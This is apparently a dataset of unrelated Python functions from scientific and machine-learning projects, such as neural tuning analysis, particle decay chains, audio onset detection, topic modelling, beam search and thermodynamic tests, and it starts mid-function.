columns=idx)\n\t\t\n\t\t\t#non biphasic version of above\n\t\t\tif not self.parameters['biphasic']:\n\n\t\t\t\tmax_val_arg = resp[:, :].argmax(axis=1)\n\t\t\t\t\t\t\t\t\t\n\t\t\t\tmax_val = resp[:, :].max(axis=1)\n\t\t\t\t\t\t \n\t\t\t\t\t\t\t \n\t\t\t\tmax_val_CI_neg = CI_neg[np.arange(n_con), max_val_arg]\n\t\t\t\t\t\t\t\t \n\t\t\t\tmax_val_CI_pos = CI_pos[np.arange(n_con), max_val_arg]\n\t\t\t\t\t\t\t\t \n\t\t\t\tself.cond_tuning = np.vstack((self.conditions,\n\t\t\t\t\t\t\t\t\t\t\t max_val,\n\t\t\t\t\t\t\t\t\t\t\t max_val_CI_neg,\n\t\t\t\t\t\t\t\t\t\t\t max_val_CI_pos))\n\t\t\t\t\t\t\t\t\t\t\t \n\t\t\t\t# Convert to Hertz - design choice is to keep all PSTH datasets as raw average spike\n\t\t\t\t# counts, with easy option of seeing frequency in the plotting, but converting to \n\t\t\t\t# Hertz for all condition tuning data.\n\t\t\t\tself.cond_tuning[1:,:] *= (1/self.bin_width)\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t# Column labels for pd.dataframe of tuning data\n\t\t\t\t# ci_perc = (100 * (1 - self.parameters['sdf_alpha']))\n\n\t\t\t\tidx = ['condition', 'max_resp', 'neg_CI', 'pos_CI']\n\n\t\t\t\t\t \n\t\t\t\t# transpose of tuning array to data frame object \n\t\t\t\tself.cond_tuning_pd = pd.DataFrame(self.cond_tuning.transpose(), columns=idx)\n\t\t\n\t\t\n\t\t# values for sinusoids/gratings\n\t\t## Note issue of temporal frequency tuning - need variable tf.\n\t\tif self.parameters['stimulus'] == 'grating':\n\t\t\t\n\t\t\tself.parameters['fft_alpha'] = alpha\n\t\t\tself.parameters['fft_number_bootstrap'] = n_bootstrap\n\t\t\t\n\t\t\tif source == 'sdf':\n\t\t\t\tprint ('WARNING, using a smoothed/filtered dataset will artificially increase'\n\t\t\t\t\t 'the amplitude of the DC component and decrease that of the F1') \n\t\t\t\n\t\t\tsources = {'sdf': self.conditions_trials_sdf,\n\t\t\t\t\t 'mov_avg': \"doesn't exist yet (?)\",\n\t\t\t\t\t 'raw': self.conditions_trials_hist}\n\t\t\t\n\t\t\tresp = sources[source]\n\t\t\t\n\t\t\ttemp_freq = self.parameters['temp_freq']\n\t\t\tstim_len = self.parameters['stimulus_length']\n\t\t\t\n\t\t\t# ensuring that the temp_freq is measured in the FFT whilst taking the maximum time.\n\t\t\t# on the basis of delt-f = 1 / n*del-t; stim_len*F1=factor; 1/(bin_width*F1)=min bins\n\t\t\t# number times greater than minimum can fit in stim_length \n\t\t\tfactor = np.floor(stim_len * temp_freq).astype('int')\n\t\t\t\n\t\t\t# number of bins to take - the window size necessary for temp_freq to be measured\n\t\t\tbins_take = np.floor(factor / (self.bin_width * temp_freq)).astype('int')\n\n\t\t\t# Frequency axis generation\n\t\t\tself.freq = fft.rfftfreq(bins_take, self.bin_width)\n\t\t\t\n\t\t\t#Checkign whether the temp_freq is in the FFT.\n\t\t\tassert self.freq[factor] == temp_freq, ('The calculated FFT F1 frequency (%s)'\n\t\t\t\t\t\t\t\t\t\t\t\t\t 'does not equal the Stimulus temp_freq (%s)'\n\t\t\t\t\t\t\t\t\t\t\t\t\t %(self.freq[bins_take], temp_freq))\n\n\t\t\t# Fourier Transform\n\t\t\tself.conditions_trials_fourier = fft.rfft(resp[:,:,:bins_take], axis=2)\n\t\t\t\n\t\t\t# Amplitude (peak-to-peak)\n\t\t\tself.conditions_trials_ampl = np.abs(self.conditions_trials_fourier)\n\t\t\t\n\t\t\t# normalising to dataset size, except the DC.\n\t\t\tself.conditions_trials_ampl[:,:,0] *= 1 / float(bins_take)\n\t\t\tself.conditions_trials_ampl[:,:,1:] *= 2 / float(bins_take)\n\t\t\t\n\t\t\t\n\t\t\t# Mean amplitudes and bootstrapped CI_intervals \n\t\t\tself.conditions_ampl_mean = np.mean(self.conditions_trials_ampl, axis=1)\n\t\t\t\n\t\t\tCI_pos, CI_neg = bootstrap(self.conditions_trials_ampl, alpha=alpha, \n\t\t\t\t\t\t\t\t\t n_bootstrap=n_bootstrap)\n\t\t\tself.conditions_ampl_CI_pos, self.conditions_ampl_CI_neg = CI_pos, CI_neg\n\t\t\t\n\t\t\t# isolating F0, F1, and F2 responses and compiling into a single table.\n\t\t\tconditions_f0 = self.conditions_ampl_mean[:,0]\n\t\t\tconditions_f1 = self.conditions_ampl_mean[:,factor]\n\t\t\tconditions_f2 = self.conditions_ampl_mean[:,2*factor]\n\t\t\t\n\t\t\t# Condition Tuning array\n\t\t\tself.cond_tuning = np.vstack((self.conditions,\n\t\t\t\t\t\t\t\t\t\t conditions_f0, CI_pos[:,0], CI_neg[:,0],\n\t\t\t\t\t\t\t\t\t\t conditions_f1, CI_pos[:,factor], CI_neg[:,factor],\n\t\t\t\t\t\t\t\t\t\t conditions_f2, CI_pos[:,2*factor], CI_neg[:,2*factor],\n\t\t\t\t\t\t\t\t\t\t conditions_f1/conditions_f0))\n\t\t\t\n\t\t\t# Convert to Hertz - design choice is to keep all PSTH datasets as raw average spike\n\t\t\t# counts, with easy option of seeing frequency in the plotting, but converting to \n\t\t\t# Hertz for all condition tuning data.\n\t\t\t\n\t\t\tself.cond_tuning[1:-1,:] *= (1/self.bin_width)\n\t\t\t\n\t\t\t# Column labels for pd.dataframe of tuning data\n\t\t\t# ci_perc = (100 * (1 - self.parameters['fft_alpha']))\n\t\t\tidx = ['conditions', \n\t\t\t\t 'F0', 'F0_pos_CI', 'F0_neg_CI', \n\t\t\t\t 'F1', 'F1_pos_CI', 'F1_neg_CI',\n\t\t\t\t 'F2', 'F2_pos_CI', 'F2_neg_CI',\n\t\t\t\t 'F1/F0_ratio']\n\t\t\t# transpose of tuning array to data frame object \n\t\t\tself.cond_tuning_pd = pd.DataFrame(self.cond_tuning.transpose(), columns=idx)\n\t\t\n\t\t\n\t\t\t \n\t\t# for orientation data, the orientation angles can get scrambled due to the circ() function\n\t\t# rotating the angles around. This orders them numerically in the final cond_tuning\n\t\t\n\t\tif self.parameters['condition_type'] == 'orientation':\n\t\t\tself.cond_tuning = self.cond_tuning[:,self.cond_tuning[0].argsort()]\n\t\t\tself.cond_tuning_pd.sort_values(self.cond_tuning_pd.columns[0], inplace=True)\n\n\n\t\t# \n\t\t# cond_tuning cleaning up and inserting important meta data / columns\n\t\t# \n\n\t\tif biphase_select_resp is not None:\n\t\t\tassert isinstance(biphase_select_resp, int) and biphase_select_resp in [1,2], \\\n\t\t\tf'biphase_select_resp ({biphase_select_resp}) must be an integer of 1 or 2'\n\n\t\t\tassert self.parameters['biphasic'], 'Stimulus not analysed as biphasic'\n\n\t\t\t# cond tuning array\n\t\t\tcond_tuning_biphase_mask = self.cond_tuning[4,:] == biphase_select_resp\n\t\t\tself.cond_tuning = self.cond_tuning[:, cond_tuning_biphase_mask]\n\n\t\t\t# cond tuning pandas dataframe\n\t\t\tself.cond_tuning_pd = self.cond_tuning_pd.query('biphas_id == @biphase_select_resp')\n\n\n\n\t\tassert hasattr(self, 'CELL_ID'), 'Make Cell ID first'\n\n\n\t\tself.cond_tuning_pd.insert(0, 'run_key', self.RUN_KEY)\n\t\tself.cond_tuning_pd.insert(0, 'cell_key', self.CELL_KEY)\n\t\tself.cond_tuning_pd.set_index(['cell_key', 'run_key'], inplace=True)\n\n\t\tself.cond_tuning_pd.insert(0, 'cond_type', self.parameters['condition_type'])\n\t\tself.cond_tuning_pd.insert(1, 'cond_unit', self.parameters['condition_unit'])", "def analyze(self,event):\n print \"\\n%s event %s %s\"%('-'*10,event.event,'-'*68)\n self.nevents += 1\n leptonic = False\n particles = Collection(event,'GenPart')\n #particles = Collection(event,'LHEPart')\n seeds = [ ] # seeds for decay chain\n chain = { } # decay chain\n print \" \\033[4m%7s %8s %8s %8s %8s %8s %8s %8s %9s %10s \\033[0m\"%(\n \"index\",\"pdgId\",\"moth\",\"mothid\",\"dR\",\"pt\",\"eta\",\"status\",\"prompt\",\"last copy\")\n for i, particle in enumerate(particles):\n mothidx = particle.genPartIdxMother\n if 0<=mothidx<len(particles):\n moth = particles[mothidx]\n mothpid = moth.pdgId\n mothdR = min(9999,particle.DeltaR(moth)) #particle.p4().DeltaR(moth.p4())\n else:\n mothpid = -1\n mothdR = -1\n eta = max(-9999,min(9999,particle.eta))\n prompt = hasbit(particle.statusFlags,0)\n lastcopy = hasbit(particle.statusFlags,13)\n print \" %7d %8d %8d %8d %8.2f %8.2f %8.2f %8d %9s %10s\"%(\n i,particle.pdgId,mothidx,mothpid,mothdR,particle.pt,eta,particle.status,prompt,lastcopy)\n if abs(particle.pdgId) in [11,13,15]:\n leptonic = True\n if mothidx in chain: # add to decay chain\n chain[mothidx].append(i)\n chain[i] = [ ] # daughters\n elif abs(particle.pdgId) in self.seedpids: # save as decay chain seed\n seeds.append(i)\n chain[i] = [ ] # daughters\n if leptonic:\n self.nleptons += 1\n print parsechain(particles,seeds,chain) # print decay chain", "def run_test(dim=3):\n\n traces = []\n\n for smoothing in range(10, 101, 10):\n pencilbeams = []\n num_sight_lines = 100\n\n # Construct our pencilbeams\n for ix in range(0, num_sight_lines+1):\n # Make impact parameters covering the full\n # particle in x\n x = ix / (1. * num_sight_lines) * smoothing\n \n pencilbeams.append(\n dict(x=x, y=0),\n )\n\n results = []\n for pencilbeam in pencilbeams:\n result = testsph(h=smoothing, dim=dim, **pencilbeam)\n results.append(result)\n\n # Integrate the pencilbeam weightings to find the full SPH weighting\n # This is the plane x-z from origin along +ve x-axis (sitting at y=0)\n particle_integral = integrate.trapz([x for x in results], [x['x'] for x in pencilbeams])\n \n # \"All smoothing lengths should integrate to the same value \"\n\n # We've sampled a quadrant in x-y and integrated entirely along z, so mulitply by 4\n print particle_integral * 4.\n\n traces.append(go.Scatter(y=[x for x in results], x=[y['x'] for y in pencilbeams]))\n\n # The mass of a particle should be the area under each of these curves(?)\n plot(traces)", "def ha(sf,sfn,mX,pX,params,verbose=[],onlySelected=False,hc=-2,div=8,L=30,fs=44100,gt=[]):\r\n \r\n M,N,H,B = params\r\n \r\n idx = candidSelection(sf,t=0.025,hw=25) \r\n idx = np.concatenate((np.zeros(1),idx,np.array([sf.shape[0]])))\r\n idx_orig = idx.copy()\r\n mask = np.ones(idx.shape)\r\n mask[0]=0\r\n mask[-1]=0\r\n errors = np.zeros(mX.shape[0])\r\n scores = np.zeros(idx.shape)\r\n freqs = []\r\n \r\n tFlag = False\r\n vFlag = False # flag to enable prints and plots\r\n \r\n rms = np.sum(mX,axis=1)\r\n rms = rms-np.mean(rms)\r\n rms = rms/np.max(rms)\r\n rms = savgol_filter(rms,3,1)\r\n \r\n rms_t = -0.1\r\n \r\n # sending every onset candidate to harmonic analysis\r\n for i in range(len(idx)-2,0,-1):\r\n \r\n if onlySelected:\r\n if idx[i] not in verbose:\r\n continue\r\n \r\n b = int((idx[i]-(10240/H)) if (idx[i]>(idx[i-1]+(10240/H))) else idx[i-1])\r\n e = int((idx[i]+(10240/H)) if (idx[i]<(idx[i+1]-(10240/H))) else idx[i+1])\r\n \r\n \r\n if np.mean(rms[int(idx[i]):int(idx[i])+50])<rms_t:\r\n continue\r\n \r\n onst = int(idx[i]-b)\r\n pmX = np.copy(mX[b:e])\r\n \r\n\r\n if idx[i] in verbose:\r\n print(\"\\nOnset candidate:\")\r\n print(\"onset frame: %d\" %idx[i])\r\n print(\"sf onset number: %d\" %i)\r\n vFlag = True\r\n y = MRStftSynth(pmX,pX[b:e],M,H,B)\r\n print(\"synthesized sound\")\r\n ipd.display(ipd.Audio(data=y, rate=fs))\r\n \r\n if vFlag:\r\n print(\"STFT around candidate\")\r\n plt.pcolormesh(np.arange(pmX.shape[0]), np.arange(pmX.shape[1]), np.transpose(pmX))\r\n plt.show()\r\n \r\n print(\"filtered spectral flux\")\r\n plt.plot(sf[b:e])\r\n plt.show()\r\n print(\"raw spectral flux\")\r\n plt.plot(sfn[b:e])\r\n plt.show()\r\n \r\n allErrors,allf0s,pmXv = f0detection(pmX,pX[b:e],sfn[b:e],-100,10,onst,vFlag,hc,div,params,fs,tFlag)\r\n\r\n aL = np.min((e-idx[i]/2,L)) \r\n segments = getSegments(allf0s,allErrors,onst,pmX,vFlag)\r\n scores[i],freq,segmentScores = harmonicScore(segments,aL,vFlag,tFlag)\r\n freqs.append(freq)\r\n \r\n if scores[i]<1: # prevent rejected candidates from creating boundary for adjacent onset\r\n idx[i] = sf.shape[0]\r\n \r\n if vFlag:\r\n print(\"Score for this onset: %d\" %scores[i])\r\n \r\n if tFlag and scores[i]<1:\r\n pred_time = np.abs(idx[i]*(H/fs))\r\n closest_gt_ind = np.argmin(pred_time-gt)[0]\r\n if np.abs(gt[closest_gt_ind]-pred_time)<0.05:\r\n if score[i]>1:\r\n tp.append[idx[i]]\r\n if score[i]<1:\r\n fn.append[idx[i]]\r\n \r\n print(\"STFT around onset\")\r\n plt.pcolormesh(np.arange(pmX.shape[0]), np.arange(pmX.shape[1]), np.transpose(pmX))\r\n plt.show()\r\n \r\n y = MRStftSynth(pmXv,pX,M,H,B)\r\n ipd.display(ipd.Audio(data=y, rate=fs))\r\n \r\n plt.pcolormesh(np.arange(pmXv.shape[0]), np.arange(pmXv.shape[1]), np.transpose(pmXv))\r\n plt.show()\r\n\r\n vFlag = False\r\n tFlag = False\r\n \r\n avg = np.mean(scores)\r\n mask[scores<1] = 0\r\n result = idx_orig[mask==1]\r\n return idx_orig[1:-1],result,freqs,scores[1:-1]", "def inference(self):\n for m, doc in enumerate(self.docs):\n # Be careful followings are views\n # So self.hoge will be change, when changing variant\n zs_j = self.zs_m_j[m]\n zk_j = self.zk_m_j[m]\n n_m_zs = self.n_m_zs[m]\n n_m_zk = self.n_m_zk[m]\n for j, t in enumerate(doc):\n # discount for n-th word t with topic z\n zs = zs_j[j]\n zk = zk_j[j]\n n_m_zs[zs] -= 1\n n_m_zk[zs, zk] -= 1\n self.n_zk_t[zk, t] -= 1\n self.n_zk[zk] -= 1\n\n # sampling topic new_z for t\n \"\"\"\n n_s = n_m_zs + self.alphas # mth doc, S vec\n p_s = n_s / np.sum(n_s)\n n_k = n_m_zk + self.alphask # mth doc, SxK matrix\n p_k = n_k / n_s.reshape(len(n_s), 1)\n n_v = self.n_zk_t[:, t] + self.beta\n p_v = n_v / (self.n_zk + self.beta)\n\n p_zsk = p_s.reshape(len(p_s), 1) * p_k * p_v # SxK matrix\n \"\"\"\n\n p_zsk = (n_m_zk + self.alphask) * self.n_zk_t[:, t] \\\n / (np.sum(n_m_zs + self.alphas) * self.n_zk)\n\n p_zs = np.sum(p_zsk, axis=1) / np.sum(p_zsk)\n p_zk = np.sum(p_zsk, axis=0) / np.sum(p_zsk)\n\n new_zs = np.random.multinomial(1, p_zs).argmax()\n new_zk = np.random.multinomial(1, p_zk).argmax()\n\n # print(\"arg\", np.argmax(p_s), np.argmax(p_k, axis=1),\n # np.argmax(p_k, axis=0), np.argmax(p_zk))\n # print('probs', p_s, p_zs)\n # print('probk', p_k, p_zk)\n # print('old', zs, zk)\n # print('new', new_zs, new_zk)\n\n # set z the new topic and increment counters\n zs_j[j] = new_zs\n zk_j[j] = new_zk\n n_m_zs[new_zs] += 1\n n_m_zk[new_zs, new_zk] += 1\n self.n_zk_t[new_zk, t] += 1\n self.n_zk[new_zk] += 1", "def interpretingMF(self):\n self.location_is_veryLessDemand = fuzz.interp_membership(self.location, self.very_less_demand, self.demandLocation)\n self.location_is_lessDemand = fuzz.interp_membership(self.location, self.less_demand, self.demandLocation)\n self.location_is_averageDemand = fuzz.interp_membership(self.location, self.average_demand, self.demandLocation)\n self.location_is_highDemand = fuzz.interp_membership(self.location, self.high_demand, self.demandLocation)\n self.location_is_veryHighDemand = fuzz.interp_membership(self.location, self.very_high_demand, self.demandLocation)\n\n self.bed_is_less = fuzz.interp_membership(self.bedroom, self.less_bed, self.numberOfBedroom)\n self.bed_is_average = fuzz.interp_membership(self.bedroom, self.average_bed, self.numberOfBedroom)\n self.bed_is_more = fuzz.interp_membership(self.bedroom, self.more_bed, self.numberOfBedroom)\n\n self.bath_is_less = fuzz.interp_membership(self.bathroom, self.less_bath, self.numberOfBathroom)\n self.bath_is_average = fuzz.interp_membership(self.bathroom, self.average_bath, self.numberOfBathroom)\n self.bath_is_more = fuzz.interp_membership(self.bathroom, self.more_bath, self.numberOfBathroom)\n\n self.fac_is_low = fuzz.interp_membership(self.facilities, self.less_fac, self.providedFacilities)\n self.fac_is_average = fuzz.interp_membership(self.facilities, self.average_fac, self.providedFacilities)\n self.fac_is_high = fuzz.interp_membership(self.facilities, self.high_fac, self.providedFacilities)\n\n self.unfunishing = fuzz.interp_membership(self.funishing, self.unfun, self.houseFunishing)\n self.partially_funishing = fuzz.interp_membership(self.funishing, self.partially_fun, self.houseFunishing)\n self.fully_funishing = fuzz.interp_membership(self.funishing, self.full_fun, self.houseFunishing)\n\n self.area_is_verysmall = fuzz.interp_membership(self.areaSize, self.very_small_area, self.houseAreaSize)\n self.area_is_small = fuzz.interp_membership(self.areaSize, self.small_area, self.houseAreaSize)\n self.area_is_average = fuzz.interp_membership(self.areaSize, self.average_area, self.houseAreaSize)\n self.area_is_large = fuzz.interp_membership(self.areaSize, self.large_area, self.houseAreaSize)\n\n self.access_is_bad = fuzz.interp_membership(self.accessibility, self.bad_access, self.accessArea)\n self.access_is_average = fuzz.interp_membership(self.accessibility, self.average_access, self.accessArea)\n self.access_is_good = fuzz.interp_membership(self.accessibility, self.good_access, self.accessArea)", "def spectrum_alignment(self):\n self.diff_PROTEIN()\n \n score = [] #node->>([t][i][j])\n for t in range(self.post_modif+1):\n pos = 0 # position of peptide for converting mass\n score_ij = {0: [ float('-inf') for t in range(len(self.vector))]}\n for amino in self.peptide:\n score_j = [ float('-inf') for t in range(len(self.vector))]\n pos += PROTEIN_MASS[amino]\n score_ij[pos] = score_j\n score.append(score_ij)\n \n score[0][0][0] = 0\n # score for node(i,j,t)\n for t in range(self.post_modif+1):\n for i in sorted(score[t]):\n if i > 0: # i-self.diff[i]\n for j in range(len(self.vector)):\n temp_max = float('-inf')\n if j >= self.diff[i]:\n temp_max = score[t][i-self.diff[i]][j-self.diff[i]]\n if t > 0:\n for j_p in range(j):\n if temp_max < score[t-1][i-self.diff[i]][j_p]:\n temp_max = score[t-1][i-self.diff[i]][j_p]\n \n score[t][i][j] = self.vector[j] + temp_max\n \n # trace back --> the longest path\n max_score = float('-inf')\n layer = 0 # modify\n row = pos # mass\n column = len(self.vector)-1 # vector\n modify = []\n for t in range(self.post_modif+1):\n if max_score < score[t][pos][-1] :\n max_score = score[t][pos][-1]\n layer = t\n \n while layer > 0:\n score_temp = score[layer][row][column] - self.vector[column]\n if score_temp == score[layer][row-self.diff[row]][column-self.diff[row]]:\n column -= self.diff[row]\n row -= self.diff[row]\n else:\n for j_p in range(column-1):\n if score_temp == score[layer-1][row-self.diff[row]][j_p]:\n modify.append((row, column-row))\n row -= self.diff[row]\n column = j_p\n layer -= 1\n break\n \n\n # print out the sequence\n modify.sort()\n sequence = \"\"\n pos = 0\n i = 0\n mass = 0\n for amino in self.peptide:\n pos += PROTEIN_MASS[amino]\n sequence += str(amino)\n if pos == modify[i][0]:\n if i == 0:\n mass = modify[i][1]\n else:\n mass = modify[i][1]-modify[i-1][1]\n \n if mass > 0:\n sequence += \"(+\"+str(mass)+\")\"\n else:\n sequence += \"(\"+str(mass)+\")\"\n i += 1\n \n print sequence", "def process_pssm_data(self):\n\n self.pssm_data = self._mask_pssm(self.pssm_data,nmask=self.nmask)\n self.pssm_data = self._filter_pssm(self.pssm_data)\n self.pssm_data = self._smooth_pssm(self.pssm_data,msmooth=self.nsmooth)\n self.pssm_data = np.mean(self.pssm_data,1)", "def cvstem(self):\n if (self.iEC == \"est\") and (len(sig(self.Cfun).parameters) == 1):\n fun1 = self.Cfun\n self.Cfun = lambda x,p: fun1(x)\n if (self.iEC == \"est\") and (len(sig(self.Gw).parameters) == 1):\n fun2 = self.Gw\n self.Gw = lambda x,p: fun2(x)\n if self.iEC == \"est\":\n self.c_over = self.matrix_2bound(self.Cfun)\n self.g_over = self.matrix_2bound(self.Gw)\n if (len(sig(self.Bw).parameters) == 1):\n fun3 = self.Bw\n self.Bw = lambda x,p: fun3(x)\n self.b_over = self.matrix_2bound(self.Bw)\n self.linesearch()\n alp = self.alp_opt\n Nx = self.Nx\n Nsplit = 1\n Np = int(Nx/Nsplit)\n Nr = np.remainder(Nx,Nsplit)\n xpmin = np.hstack((self.xlims[0,:],self.plims[0,:]))\n xpmax = np.hstack((self.xlims[1,:],self.plims[1,:]))\n Nxp = self.n+self.n_p\n xps = np.random.uniform(xpmin,xpmax,size=(Nx,Nxp))\n xs_opt,ps_opt,_ = np.hsplit(xps,np.array([self.n,Nxp]))\n Ws_opt = []\n chi_opt = 0\n nu_opt = 0\n print(\"========================================================\")\n print(\"====== SAMPLING OF CONTRACTION METRICS BY CV-STEM ======\")\n print(\"========================================================\")\n for p in range(Np):\n if np.remainder(p,int(Np/10)) == 0:\n print(\"# sampled metrics: \",p*Nsplit,\"...\")\n xs_p = xs_opt[Nsplit*p:Nsplit*(p+1),:]\n ps_p = ps_opt[Nsplit*p:Nsplit*(p+1),:]\n self.cvstem0(xs_p,ps_p,alp)\n Ws_opt += self.Ws\n if self.nu >= nu_opt:\n nu_opt = self.nu\n if self.chi >= chi_opt:\n chi_opt = self.chi\n if Nr != 0:\n print(\"# samples metrics: \",Nx,\"...\")\n xs_p = xs_opt[Nsplit*(p+1):Nx,:]\n ps_p = ps_opt[Nsplit*(p+1):Nx,:]\n self.cvstem0(xs_p,ps_p,alp)\n Ws_opt += self.Ws\n if self.nu >= nu_opt:\n nu_opt = self.nu\n if self.chi >= chi_opt:\n chi_opt = self.chi\n self.xs_opt = xs_opt\n self.ps_opt = ps_opt\n self.Ws_opt = Ws_opt\n self.chi_opt = chi_opt\n self.nu_opt = nu_opt\n if self.iEC == \"est\":\n self.Jcv_opt = (self.d1_over*self.b_over*np.sqrt(chi_opt)\\\n +self.d2_over*self.c_over*self.g_over*nu_opt)/alp\n print(\"Optimal steady-state estimation error =\",\\\n \"{:.2f}\".format(self.Jcv_opt))\n elif self.iEC == \"con\":\n self.Jcv_opt = self.d1_over*self.b_over*np.sqrt(chi_opt)/alp\n print(\"Optimal steady-state tracking error =\",\\\n \"{:.2f}\".format(self.Jcv_opt))\n else:\n raise ValueError('Invalid iEC: iEC = \"est\" or \"con\"')\n self.M2cholM()\n path = \"models/optvals/\"+self.fname\n if os.path.exists(path) == False:\n try:\n os.makedirs(path)\n except: \n raise OSError(\"Creation of directory %s failed\" %path)\n else:\n print (\"Successfully created directory %s \" %path)\n else:\n print (\"Directory %s already exists\" %path)\n np.save(path+\"/alp_opt.npy\",alp)\n np.save(path+\"/chi_opt.npy\",self.chi_opt)\n np.save(path+\"/nu_opt.npy\",self.nu_opt)\n np.save(path+\"/Jcv_opt.npy\",self.Jcv_opt)\n print(\"========================================================\")\n print(\"==== SAMPLING OF CONTRACTION METRICS BY CV-STEM END ====\")\n print(\"========================================================\\n\\n\")\n pass", "def beam_search_step(state, logits, eos_id, beam_width, is_first_step, length_penalty):\n _, vocab_size = logits.shape\n\n bsz, beam_width = state.log_probs.shape\n onehot_eos = paddle.cast(nn.functional.one_hot(paddle.ones([1], 'int64') * eos_id, vocab_size), 'int64') #[1, V]\n\n probs = paddle.log(nn.functional.softmax(logits)) #[B*W, V]\n probs = mask_prob(probs, onehot_eos, state.finished) #[B*W, V]\n allprobs = paddle.reshape(state.log_probs, [-1, 1]) + probs #[B*W, V]\n\n not_finished = 1 - paddle.reshape(state.finished, [-1, 1]) #[B*W,1]\n not_eos = 1 - onehot_eos\n length_to_add = not_finished * not_eos #[B*W,V]\n alllen = paddle.reshape(state.lengths, [-1, 1]) + length_to_add\n\n allprobs = paddle.reshape(allprobs, [-1, beam_width * vocab_size])\n alllen = paddle.reshape(alllen, [-1, beam_width * vocab_size])\n allscore = hyp_score(allprobs, alllen, length_penalty)\n if is_first_step:\n allscore = paddle.reshape(allscore, [bsz, beam_width, -1])[:, 0, :] # first step only consiter beam 0\n scores, idx = paddle.topk(allscore, k=beam_width) #[B, W]\n next_beam_id = idx // vocab_size #[B, W]\n next_word_id = idx % vocab_size\n\n gather_idx = paddle.concat([paddle.nonzero(idx != -1)[:, :1], paddle.reshape(idx, [-1, 1])], 1)\n next_probs = paddle.reshape(paddle.gather_nd(allprobs, gather_idx), idx.shape)\n next_len = paddle.reshape(paddle.gather_nd(alllen, gather_idx), idx.shape)\n\n gather_idx = paddle.concat([paddle.nonzero(next_beam_id != -1)[:, :1], paddle.reshape(next_beam_id, [-1, 1])], 1)\n next_finished = paddle.reshape(paddle.gather_nd(state.finished, gather_idx),\n state.finished.shape) #[gather new beam state according to new beam id]\n\n next_finished += paddle.cast(next_word_id == eos_id, 'int64')\n next_finished = paddle.cast(next_finished > 0, 'int64')\n\n next_state = BeamSearchState(log_probs=next_probs, lengths=next_len, finished=next_finished)\n output = BeamSearchOutput(scores=scores, predicted_ids=next_word_id, beam_parent_ids=next_beam_id)\n\n return output, next_state", "def __init__(self, connection_type, steel, beam_dead_load, beam_live_load, span,\r\n left_beam=None, right_beam=None, top_column=None, bottom_column=None):\r\n self.connection_type = connection_type\r\n # The dictionary used to store the RBS dimensions\r\n self.left_RBS_dimension = {}\r\n self.right_RBS_dimension = {}\r\n # The dictionary used to store the probable moment\r\n self.moment = {}\r\n # The dictionary used to store the shear force\r\n self.shear_force = {} # keys:\r\n # A scalar used to denote the doubler plate thickness\r\n self.doubler_plate_thickness = 0\r\n # A dictionary used to store the failure mode (if any)\r\n self.is_feasible = {} # keys: 'geometry limit', 'flexural strength', 'shear strength', 'SCWB'\r\n # Define a boolean flag which denotes the overall check results (True means OK.)\r\n self.flag = None\r\n\r\n # Call methods to initialize the attributes listed above\r\n self.check_column_beam(connection_type, left_beam, right_beam, top_column, bottom_column)\r\n self.extract_reduced_beam_section(connection_type, left_beam, right_beam)\r\n self.compute_probable_moment_RBS(connection_type, steel, left_beam, right_beam)\r\n self.compute_shear_force_RBS(connection_type, beam_dead_load, beam_live_load, span, bottom_column)\r\n self.compute_probable_moment_column_face(connection_type)\r\n self.compute_plastic_moment(connection_type, steel, left_beam, right_beam)\r\n self.check_moment_column_face(connection_type)\r\n self.check_shear_strength(connection_type, beam_dead_load, beam_live_load, left_beam, right_beam)\r\n self.check_column_beam_relationships(connection_type, steel, left_beam, right_beam, top_column, bottom_column)\r\n self.determine_doubler_plate(connection_type, steel, left_beam, right_beam, bottom_column, top_column)", "def test_set_sp(self):\n s = State(substance=\"water\")\n s.sp = Q_(3028.9867985920914, \"J/(kg*K)\"), Q_(101325.0, \"Pa\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(373.1242958476843, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.sp[0], Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.sp[1], Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.u, Q_(1013250, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(3028.9867985920914, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(0.4772010021515822, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(1061602.391543017, \"J/kg\")) # type: ignore\n assert np.isclose(s.x, Q_(0.28475636946248034, \"dimensionless\")) # type: ignore\n s.sp = Q_(8623.283568815832, \"J/(kg*K)\"), Q_(101325.0, \"Pa\")\n assert np.isclose(s.T, Q_(700.9882316847855, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.sp[0], Q_(8623.283568815832, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.sp[1], Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.u, Q_(3013250, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(8623.283568815832, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(3.189303132125469, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(3336406.139862406, \"J/kg\")) # type: ignore\n assert s.x is None", "def get_effect_size(self, summ, b, nmc=5000):\n m0b, v0b = self.DModel.models[0].predict(np.array([b])) \n m1b, v1b = self.DModel.models[1].predict(np.array([b]))\n \n d_mean_D = np.squeeze(m1b - m0b) # TODO: why was this swapped around?\n d_var_D = np.squeeze(v0b + v1b)\n d_std_D = np.sqrt(d_var_D)\n \n if d_mean_D < 0:\n pval = 1 - stats.norm.cdf(x=0, loc=d_mean_D, scale=d_std_D)\n else:\n pval = stats.norm.cdf(x=0, loc=d_mean_D, scale=d_std_D)\n \n xmin, xmax = (np.min([d_mean_D - 4*d_std_D, -0.1*d_std_D]), \n np.max([d_mean_D + 4*d_std_D, 0.1*d_std_D]))\n \n n = 300\n xrange = np.linspace(xmin, xmax, n)\n y = stats.norm.pdf(xrange, d_mean_D, d_std_D) \n \n samples = np.zeros((nmc))\n nspike = int(np.round(summ['pmp']['pmc']*nmc))\n samples[nspike:] = np.random.normal(loc=d_mean_D, \n scale=np.sqrt(d_var_D), \n size=(nmc-nspike))\n \n if not np.isscalar(b):\n d_bma = None\n else:\n \n if nspike==nmc:\n # BMA dominated by continuous model\n # Put all mass at xrange closest to b\n d_bma = np.zeros((n))\n xdelta = xrange[1] - xrange[0]\n ix = np.argmin((xrange-b)**2)\n d_bma[ix] = 1.0 / xdelta\n 